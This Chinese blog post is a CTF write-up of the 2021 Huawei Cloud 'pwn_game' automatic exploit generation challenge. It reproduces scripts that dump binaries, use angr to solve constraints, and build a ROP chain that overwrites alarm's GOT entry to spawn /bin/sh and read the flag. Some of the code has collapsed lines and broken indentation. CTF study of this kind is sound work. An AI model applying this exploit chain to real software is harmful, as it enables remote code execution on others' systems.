CTF中的AEG(五) 2021 华为云专场 pwn_game

最新推荐文章于 2024-03-30 23:56:03 发布
最新推荐文章于 2024-03-30 23:56:03 发布
阅读量692 收藏 1
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/122907048
版权

在本地搭了环境
相关的docker啥的官方给了
在github
搜一下就可

nc一下
在这里插入图片描述先用相应脚本把程序拿出来

import re
import itertools
import string
import codecs
from hashlib import sha256
from pwn import remote, context
import os
import itertools
import datetime
context.log_level = 'debug'


def exp():
    sh = remote('127.0.0.1' , "9997")
    sh.recvuntil("data info------------------\n")
    d = sh.recvuntil("Hi")
    d = d[:-3]
    print d
    with open('out.data', 'wb') as f:
        f.write(d)

    os.system('base64 -d out.data > 1.elf')
    
    sh.interactive()
    

while(1):
    exp()

多拿几个
看一下保护
在这里插入图片描述没有canary、pie、relro

拿到的文件丢到ida看一下
在这里插入图片描述在这里插入图片描述
他让我们运行这个程序,后面带上输入
输入的作用就是作为参数,进去过约束
然后直接就是一个栈溢出。
程序简直不要太简单
我们多来几个文件试试看他在什么地方随机

在这里插入图片描述四个程序
这就显而易见了嘛

约束当然是随机的
栈溢出的长度也是随机的
payload最大长度也是随机的,不过这个应该影响不大。

额外提一句时间是3s

我们一起来瞅瞅官方给的wp咋写的。
get_addr.py

import commands

#封装了一个执行命令行命令的函数
def do_command(cmd_line):
	(status, output) = commands.getstatusoutput(cmd_line)
	return output
​
#在字符串中间找一个字符串
def get_mid_str(data, b_str, e_str, s_pos = 0):
	b_pos = data.find(b_str, s_pos)
	if b_pos == -1:
		return ""
	b_pos += len(b_str)
	e_pos = data.find(e_str, b_pos)
​
	data = data[b_pos:e_pos]
	#print s_pos, b_pos, e_pos
	#print data
	while b_str in data:
		data = data[data.find(b_str)+len(b_str):]
	#print data
	return data
​
#一个写文件操作
def write_file(filename, data, mode = "wb"):
	file_w = open(filename, mode)
	file_w.write(data)
	file_w.close()#对那个dump下来的二进制文件进行处理
#把解题要用的相关信息拿出来丢在angr_deal.conf文件中
def do_angr_conf():
	tmp_file_asm = do_command("objdump -d tmp_file.bin")
​
	b_pos = tmp_file_asm.find("<__libc_start_main@plt>\n")
​
	main_addr = get_mid_str(tmp_file_asm, " mov   $0x", ",%rdi\n", b_pos - 0x80)
	#print main_addr
	b_pos = tmp_file_asm.find("%s:"%main_addr)
	b_pos = tmp_file_asm.find(" <atoi@plt>\n", b_pos)
	deal_func_addr = get_mid_str(tmp_file_asm, "callq ", " <", b_pos)
	print "start_addr =>", deal_func_addr
​
	b_pos = tmp_file_asm.find("%s:"%deal_func_addr)
	s_b_pos = tmp_file_asm.find(" callq ", b_pos - 0x100)
	success = get_mid_str(tmp_file_asm, "$0x1,%eax\n ", ": ", s_b_pos - 0x80)
	print "success =>", success
	f_b_pos = tmp_file_asm.find("leave", b_pos)
	fail = get_mid_str(tmp_file_asm, "$0x0,%eax\n ", ": ", f_b_pos - 0x80)
	print "fail =>", fail
​
	data_write = ""
	data_write += deal_func_addr + "\n"
	data_write += success + "\n"
	data_write += fail + "\n"
​
	write_file("angr_deal.conf", data_write)#进行一些pwn用的设置
#具体来说就是先ROPgadget直接搜要用的gadget
#然后把rop链写在do_pwn_next.conf文件里面一会用
def do_pwn_conf():
	rop_asm = do_command("ROPgadget --binary tmp_file.bin")
​
	rop_map = {}
	rop_map["p_rdi_ret"] = "pop rdi ; ret"
	rop_map["p_rsi_r15_ret"] = "pop rsi ; pop r15 ; ret"
	rop_map["ret_addr"] = "ret"
	rop_map["p_rbp_ret"] = "pop rbp ; ret"
	rop_map["set_args_addr"] = "pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret"
​
	rop_map_val = {}
​
	mov_edx_rbp_p_rbp_ret = 0for line in rop_asm.split("\n"):
		items = line.split(" : ")
		if len(items) != 2:
			continuefor key in rop_map.keys():
		if key not in rop_map_val.keys():
			if items[1] == rop_map[key]:
				rop_map_val[key] = int(items[0], 16)if items[1].startswith("pop rbp ; mov byte ptr [rip + ") and items[1].endswith("], 1 ; ret"):
			mov_edx_rbp_p_rbp_ret = int(items[0], 16) - 10
​
​
		got_data = do_command("objdump -R tmp_file.bin")
		alarm_got = 0for line in got_data.split("\n"):
		items = line.split(" ")
	if len(items) < 3:
		continue
	got_name = items[-1].split("@")[0]
	if got_name == "alarm":
		alarm_got = int(items[0], 16)
	​
	tmp_file_asm = do_command("objdump -d tmp_file.bin")
	b_pos = tmp_file_asm.find(" <read@plt>:\n")
	read_plt = get_mid_str(tmp_file_asm, "\n", " <read@plt>:\n", b_pos - 0x18)
	read_plt = int(read_plt, 16)
	b_pos = tmp_file_asm.find(" <atoi@plt>:\n")
	atoi_plt = get_mid_str(tmp_file_asm, "\n", " <atoi@plt>:\n", b_pos - 0x18)
	atoi_plt = int(atoi_plt, 16)
​
	b_pos = tmp_file_asm.find(" <read@plt>\n")
	#print tmp_file_asm[b_pos-0x100:b_pos+0x10]
	rbp_val = get_mid_str(tmp_file_asm, " lea ", "(%rbp),%rax", b_pos - 0x100)
	#print rbp_val
	rbp_val = int(rbp_val.strip(), 16)
	print "rbp:", hex(rbp_val)
​
	data_write = ""
	data_write += "0x%x\n"%rop_map_val["p_rdi_ret"]
	data_write += "0x%x\n"%rop_map_val["p_rsi_r15_ret"]
	data_write += "0x%x\n"%rop_map_val["ret_addr"]
	data_write += "0x%x\n"%rop_map_val["p_rbp_ret"]
	data_write += "0x%x\n"%mov_edx_rbp_p_rbp_ret
	data_write += "0x%x\n"%(rop_map_val["set_args_addr"] - 1)
	data_write += "0x%x\n"%(rop_map_val["set_args_addr"] - 1 - 0x1a)
	data_write += "0x%x\n"%alarm_got
	data_write += "0x%x\n"%read_plt
	data_write += "0x%x\n"%atoi_plt
	data_write += "%s\n"%hex(rbp_val).replace("L", "").replace("l", "")
​
​
	write_file("do_pwn_next.conf", data_write)

​
​
def do_work():
	do_angr_conf()
	do_pwn_conf()
​
​
do_work()

angr_deal.py
利用angr过约束就在这个文件里面

import angr
from angr import *
#from simuvex.procedures.stubs.UserHook import UserHook
​
binary_path = "./tmp_file.bin"
​
stack_addr = 0
​
​
def get_mem(state, addr, size):
	mem = state.memory.load(addr, size)
	#print mem
	return state.se.eval(mem)def gen_cond(state, index):
	"""Returns a symbolic BitVector and contrains it to printable chars for a given state."""
	bitvec = state.se.BVS('c%d'%index, 8, explicit_name=True)
	return bitvec, state.se.And(bitvec >= 0x0, bitvec <= 0xff)
	​
​
def read_file(filename, mode = "rb"):
	file_r = open(filename, mode)
	data = file_r.read()
	file_r.close()
	return data
​
def write_file(filename, data, mode = "wb"):
	file_w = open(filename, mode)
	file_w.write(data)
	file_w.close()def run_angr():#proj = angr.Project(binary_path, load_options={'auto_load_libs': False})
	proj = angr.Project(binary_path)#, load_options={'auto_load_libs': False})


	data = read_file("angr_deal.conf")
	if len(data) > 0:
		items = data.split('\n')
		start_addr = int(items[0], 16)
		success = (int(items[1], 16), )
		fail = (int(items[2], 16), )print (start_addr)
		print (success)
		print (fail)print hex(start_addr)
		print hex(success[0])
		print hex(fail[0])else:
		start_addr = 0x400B57
		success = (0x400C45, )
		fail = (0x400C6C, )#"""
	initial_state = proj.factory.blank_state(addr = start_addr)
​
	r_edi = initial_state.se.BVS('edi', 32)
	initial_state.regs.edi = r_edi
​
	pg = proj.factory.simgr(initial_state, immutable=False)
	pg.explore(find=success, avoid=fail)
	found_state = pg.found[0]
	result = found_state.se.eval(r_edi)
	print hex(result)
	write_file("passcode.conf", "%d"%result)
	exit(0)
​
run_angr()

aeg_pwn.py

from zio import *#用zio做了交互

is_local = True
is_local = False
​
binary_path = "./no"
​
libc_file_path = ""
#libc_file_path = "./libc.so.6"
​
ip = "127.0.0.1"
port = 2333if is_local:
	target = binary_path
else:
	target = (ip, port)#是本地连接还是远程链接

def d2v_x64(data):
	return l64(data[:8].ljust(8, '\x00'))

def d2v_x32(data):
	return l32(data[:4].ljust(4, '\x00'))#32位或者64位的接受吧


def rd_wr_str(io, info, buff):
	io.read_until(info)
	io.write(buff)

def rd_wr_int(io, info, val):
	rd_wr_str(io, info, str(val) + "\n")#两个转字符串函数def get_io(target):
	r_m = COLORED(RAW, "green")
	w_m = COLORED(RAW, "blue")
	#io = zio(target, timeout = 9999, print_read = r_m, print_write = w_m)
	io = zio(target, timeout = 9999, print_read = r_m, print_write = w_m,env={"LD_PRELOAD":libc_file_path})
	return io
​#就是拿到io

def write_file(filename, data, mode = "wb"):
file_w = open(filename, mode)
file_w.write(data)
file_w.close()import commands
def do_command(cmd_line):
	(status, output) = commands.getstatusoutput(cmd_line)
	return output
#执行命令def read_file(filename, mode = "rb"):
	file_r = open(filename, mode)
	data = file_r.read()
	file_r.close()
	return data
​#读文件

set_args_addr = 0x400d2a
call_func_addr = 0x400d10def gen_rop(func_got, arg1, arg2 = 0, arg3 = 0, ret_addr = None):
  global set_args_addr, call_func_addr
  #set_args_addr
  payload = ""
  payload += l64(set_args_addr)
  payload += l64(0)           #pop rbx = 0
  payload += l64(1)           #pop rbp
  payload += l64(func_got)     #pop r12
  payload += l64(arg3)         #pop r13
  payload += l64(arg2)         #pop r14
  payload += l64(arg1)         #pop r15
  if ret_addr != None:
      payload += l64(ret_addr)
  else:
      payload += l64(call_func_addr)return payload
​#编写payloaddef do_pwn_next(io):
	global set_args_addr, call_func_addr
	p_rdi_ret = 0x0000000000400d33
	p_rsi_r15_ret = 0x0000000000400d31
	p_rbp_ret = 0x400B55
	ret_addr = 0x0000000000400b31
​
	mov_edx_rbp_p_rbp_ret = 0x4008E8 #adc     [rbp+48h], edx
​
	read_plt                   = 0x00000000004007e0
	alarm_got                 = 0x0000000000602038
	atoi_plt   = 0x400800
​
	data = read_file("do_pwn_next.conf")
	val_list = []
	#写了个文件,又把相关数据读了出来
	#感觉有点麻烦
	
	for line in data.strip().split("\n"):
	val_list.append(int(line, 16))
	print hex(int(line, 16))
​
	p_rdi_ret = val_list[0]
	p_rsi_r15_ret = val_list[1]
	ret_addr = val_list[2]
	p_rbp_ret = val_list[3]
	mov_edx_rbp_p_rbp_ret = val_list[4]
	set_args_addr = val_list[5]
	call_func_addr = val_list[6]
	alarm_got = val_list[7]
	read_plt = val_list[8]
	atoi_plt = val_list[9]
​
	rbp_add_val = val_list[10]#对数据进行一些处理之后再写出来
​
	bss_addr = 0x00601000 + 0xa00
​
	pre_payload = ""
	pre_payload += 'a'*(0-rbp_add_val)
	pre_payload += 'b'*8
	#重点是在preload中填充的长度也要通过angr来获得
​
	payload = ""
	payload += l64(p_rdi_ret) + l64(0)
	payload += l64(p_rsi_r15_ret) + l64(bss_addr)*2
	payload += l64(read_plt)
​
	payload += gen_rop(bss_addr, 0, 0, 0x5)
	payload += gen_rop(bss_addr, 0, 0, 0x5)[:-8]
	payload += l64(p_rbp_ret) + l64(alarm_got - 0x48)
	payload += l64(mov_edx_rbp_p_rbp_ret) * 2#set rax = 0x3b
	payload += l64(p_rdi_ret) + l64(bss_addr + 0x20 + 0*2)
	payload += l64(atoi_plt)
	#execve("/bin/sh", 0, 0)
	payload += gen_rop(alarm_got, bss_addr + 0x8, 0, 0)
	#payload += gen_rop(alarm_got, bss_addr + 0x8, 0, 0)[:-8]
	payload += "\n"#io.gdb_hint()
	#print repr(payload)
	print hex(len(payload))
​
	payload = pre_payload + payload
	print payload[:-1].find("\n")#payload还分成了两个部分,但是总起来讲是劫持了alarm的got表

	#io.gdb_hint()
	io.write(payload)#raw_input(":")import time
	time.sleep(0.5)
	payload = ""
	payload += l64(ret_addr)
	payload += "/bin/sh\x00".ljust(0x18, '\x00')
	payload += "59\x00"
	payload += "\n"
	io.write(payload)
	time.sleep(0.5)

​
	io.writeline("id")
	io.writeline("ls -al")
	io.writeline("cat flag 2>&1")
	io.writeline("exit")
	io.interact()def pwn(io):
	io.read_until("------------------data info------------------\n")
	data = io.read_until("\n").strip()
	data = data.decode("base64")
	print(len(data))
	write_file("tmp_file.bin", data)
	#print repr(data.decode("base64")[:4])#文件都卸载tmp_file.bin里面

	io.read_until("code:")
	do_command("chmod +x tmp_file.bin")
	do_command("python get_addr.py")
	do_command("python angr_deal.py")#执行三个命令	

	data = read_file("passcode.conf")
#do_command("rm tmp_file.bin luckynum.conf")#从文件里面读数据,这里的数据应该是调用angr过了约束得到的

	data = data.strip()
	io.writeline(data)#对数据进行处理然后写回去

	do_pwn_next(io)#调用这个函数进行后面的利用

	io.interact()
​
io = get_io(target)
#先拿到io
pwn(io)
exit(0)

整体来说题目难度不大
wp感觉稍微写的有点繁琐
但是里面对rop链的编写很值得学习

yongbaoii
关注
专栏目录
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 460
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表设定内容居、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
【愚公系列】2024年03月 《CTF实战:从入门到提升》 003-Web安全基础知识(HTTP安全)
时光隧道
02-26 5万+
HTTP安全是指在使用HTTP协议进行通信时,采取的一系列措施和技术,以确保传输过程的数据的机密性、完整性和可信性。HTTP协议本身是一种明文的协议,数据在传输过程容易被窃听、篡改或伪造。措施描述HTTPS在HTTP协议基础上增加了SSL/TLS加密层,通过对通信内容进行加密以保护数据的机密性。加密使用对称加密或非对称加密算法对敏感数据如用户登录信息或支付信息进行加密,防止数据被窃听。认证通过身份验证技术验证通信双方的身份,确保通信的可信性。
CTFAEG(七) 对aeg题目源码分析 华为云专场-pwn_game
yongbaoii的博客
04-18 518
想起来就发点
ISCC2021-[pwn]game
半岛铁盒的博客
05-26 689
from pwn import * from ctypes import * p = remote('39.96.88.40','7040') context.log_level="debug" payload = b'a' * (0x30-0x8) + p32(0) p.sendlineafter("Your name is :",payload) rand = ['55 ','15 ','82 ','1 ','98 ','68 ','67 ','15 ','86 ','3 '] fo...
攻防世界dice_game(pwn)
CTF小白的博客
05-08 4669
dice_game 题目考察:rand()生成的随机数和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机数列。 题目分析 这边就可以看到,buf覆盖0x40位就能覆盖到seed。 sub_A20()如下,就是比较你输入的数是否和产生的随机数相等。 当回答正确50次时,会执行sub_B28这个函数,读取flag。 所以我们要做...
BUUCTF pwn qctf_2018_dice_game
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
热门推荐
时光隧道
03-28 5万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。
HWS-CTF-第七期山大站-PWN-【inverse】
llovewuzhengzi的博客
11-19 292
第一次真正意义上独立在比赛做出题目来了,距离真正意义接触CTF-PWN差不多正好两个月。但由于不知道靶场要自己开而且端口每次自己打开会改,交flag稍微晚了些(我太菜了)
【愚公系列】2024年03月 《CTF实战:从入门到提升》 011-Web安全入门(PHP反序列化漏洞)
最新发布
时光隧道
03-30 5万+
PHP是一种广泛使用的开源服务器端脚本语言,它支持面向对象的编程范式。在PHP,类和对象是用于封装数据与功能的核心组件,它们使得代码更加模块化、易于管理和扩展。在处理对象持久化——即在不同会话或不同请求之间保存对象状态的过程,序列化和反序列化是两个非常重要的概念。反序列化漏洞通常发生在不安全地反序列化用户提供的数据时。代码执行:攻击者可能会注入恶意对象,当这个对象被反序列化时,它可能会触发任意代码执行。对象注入:通过构造特殊的序列化数据,攻击者可能会在应用程序上下文创建不正当的对象实例。
【愚公系列】2024年03月 《CTF实战:从入门到提升》 004-Web安全基础知识(基础工具使用)
时光隧道
02-26 5万+
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决一系列与网络安全相关的问题,获取旗帜并积分。CTFWeb安全基础工具则是在CTF用于进行Web安全攻防的工具。作用和意义描述简化攻防过程CTFWeb安全基础工具提供了各种自动化和半自动化的工具,可以帮助参赛者快速进行渗透测试、漏洞挖掘和攻击。这些工具可以简化繁琐的攻击过程,提高效率。快速发现漏洞CTFWeb安全基础工具集成了各种漏洞扫描和渗透测试工具,可以帮助参赛者快速发现Web应用程序的漏洞。
Zeratool:自动利用漏洞利用(AEG)和远程标志捕获来解决可利用的CTF问题
04-29
Zeratool 自动利用漏洞利用(AEG)和远程标志捕获来解决可利用的CTF问题 该工具使用通过挂接printf并查找来协整地分析二进制文件。 然后,这些程序状态通过和一系列脚本技巧被武器化以用于远程代码执行。 最后,在本地对有效负载进行测试,然后将其提交给远程CTF服务器以恢复该标志。 正在安装 Zeratool已在Ubuntu 16.04上进行了测试,并且已将安装脚本从Ubuntu 12.04设置为Ubuntu 18.04。 ./install.sh 用法 Zeratool是一个python脚本,它接受二进制文件作为参数,还可以选择链接的libc库,以及CTF Server连接信息 [chris:~/Zeratool] [angr] python zeratool.py -h usage: zeratool.py [-h] [-l LIBC] [-u URL] [-p PORT]
pwn_dice_game
weixin_44464829的博客
10-31 278
常规操作:checksec dice_game 发现文件是64位 放入ida看c的伪代码: 这是一个猜数字的题,之前有做过类似的题,目的是覆盖seed,使随机数不再随机产生 点开sub_A20()看看随机数怎么构造的: 可以看到rand()%6+1线性同余的方式生成随机数,下一步就是想要覆盖掉种子位置上的值 看一下种子的位置: buf是我们可以写 入数据的缓冲区,通过read函数写入,这又是经典的栈溢出漏洞 0x50-0x10=0x40 因为附件解压后有两个文件,其一个是l
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 548
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
攻防世界pwn——dice_game
qq_62076255的博客
12-19 466
攻防世界pwn——dice_game做题记录
漏洞挖掘 符号执行_初探利用angr进行漏洞挖掘(上)
weixin_39943678的博客
12-15 1884
前言angr是一个基于python开发的一款符号执行工具,可以用于二进制分析,在CTF逆向有很大的用途,例如可以通过约束求解找到复杂计算的正确解,从而拿到flag;然而angr的用途远不止于此,它甚至还能被用于AEG (Automatic Exploit Generation) ,有一个叫zeratool的工具实现了一些用于简单的pwnAEGAEG的步骤一般分为:挖掘漏洞生成利用exp验证e...
2020XCTF华为云专场pwn题WP
Sakura给爷pwn全场
12-23 510
Pwn CPP 解题思路 题⽬存在uaf,结合堆⻛⽔getshell #!/usr/bin/python #coding:utf-8 from pwn import * context.log_level='debug' #io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"}) io=remote('124.70.12.210', 10002) libc=ELF("./libc-2.31.so") sla=lambda a : io.sendlin
漏洞挖掘 符号执行_漏洞挖掘、利用及修复——从人工到自动的跨越
weixin_42164702的博客
12-29 789
随着互联网的普及,各类App如雨后春笋般产生。受限于代码质量,App或多或少的会存在各类漏洞。据统计,CVE(http://cve.mitre.org/)及CNNVD(http://www.cnnvd.org.cn/)能够涵盖的漏洞多达100000个,严重威胁着网络及用户安全。当前,二进制漏洞挖掘主要依靠专业人员的人工审计,从而能够提供准确的漏洞点、漏洞利用及修补方案。然而,人工审计与挖掘存在以...
CTFAEG(一) 基础知识
yongbaoii的博客
04-06 842
很早之前学习的 忘了还有这玩意
Pwn的虚拟机
qq_43553690的博客
08-09 1691
Pwn的虚拟机 刚刚接触到Pwn这个方向,学习教程上面的各种命令和操作。 但是,没有视频那些工具,学习的效率会降低。 最好,教学视频上的每一个指令都直接亲手打一遍。 去理解每个知识点的意思。 然后放上来一个做pwn题的虚拟机,方便新手去学习。 这个虚拟机文件导出式为ovf式。 点击红色方框来打开。 然后等待一会就可以了。 我的用户名是:isidro 密码是:toor root的...
为IMS计费系统:在线与离线计费原理
为的IMS(IP Multimedia Subsystem)计费系统是电信网络一个重要的组成部分,用于管理和计收用户的通信费用。该系统支持在线计费和离线计费两种模式,满足不同类型的业务需求。 1. 离线计费原理介绍: 离线计费...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值